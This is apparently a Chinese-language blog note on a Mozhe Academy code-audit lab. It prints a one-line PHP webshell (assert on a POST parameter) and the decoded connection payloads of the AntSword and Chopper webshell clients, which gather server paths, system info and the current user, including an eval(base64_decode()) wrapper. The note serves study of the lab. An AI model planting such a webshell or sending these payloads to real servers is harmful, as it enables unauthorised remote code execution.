墨者学院的代码审计：

解题思路就不说了，这里推荐先知社区
这里整理一下在做题其中遇到的问题

第一题：
一句话木马，效果相当于这样

<?php assert($_POST['1']);?>

一开始用蚁剑链接的，报错，心想是不是过滤了什么。
然后直接用命令注入直接ls,cat，发现ls可以出来，cat不出来。
当时忘了用var_dump看看是被过滤了还是还是其他的什么原因。
但是用菜刀链接成功了，难道菜刀和蚁剑不是用的一套payload？
bp抓包，试一下。
蚁剑：(蚁剑用的是url编码，我解码，在格式化后的)

1 =
@ini_set("display_errors", "0");
@set_time_limit(0);
echo "e0372";
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D}  ";
if (substr($D, 0, 1) != "/") {
    foreach (range("C", "Z") as $L) if (is_dir("{$L}:")) $R.= "{$L}:";
} else {
    $R.= "/";
}
$R.= "  ";
$u = (function_exists("posix_getegid")) ? @posix_getpwuid(@posix_geteuid()) : "";
$s = ($u) ? $u["name"] : @get_current_user();
$R.= php_uname();
$R.= "  {$s}";
echo $R;;
echo "d2119";
die();

emmm..有点复杂，先不研究这个
接着看菜刀：

1=@eval�(base64_decode($_POST[action]));

&action=
@ini_set("display_errors", "0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo ("->|");;
$D = dirname($_SERVER["SCRIPT_FILENAME"]);
if ($D == "") $D = dirname($_SERVER["PATH_TRANSLATED"]);
$R = "{$D}\t";
if (substr($D, 0, 1) != "/") {
    foreach (range("A", "Z") as $L) if (is_dir("{$L}:")) $R.= "{$L}:";
}
$R.= "\t";
$u = (function_exists('posix_getegid')) ? @posix_getpwuid(@posix_geteuid()) : '';
$usr = ($u) ? $u['name'] : @get_current_user();
$R.= php_uname();
$R.= "({$usr})";
print $R;;
echo ("|<-");
die();

对比一下发现，两段代码在构造php代码上基本没有区别
就是菜刀多加了一层eval
那这样的意义是什么呢
从柠檬师傅的帖子
看，emmm...看不懂..先贴着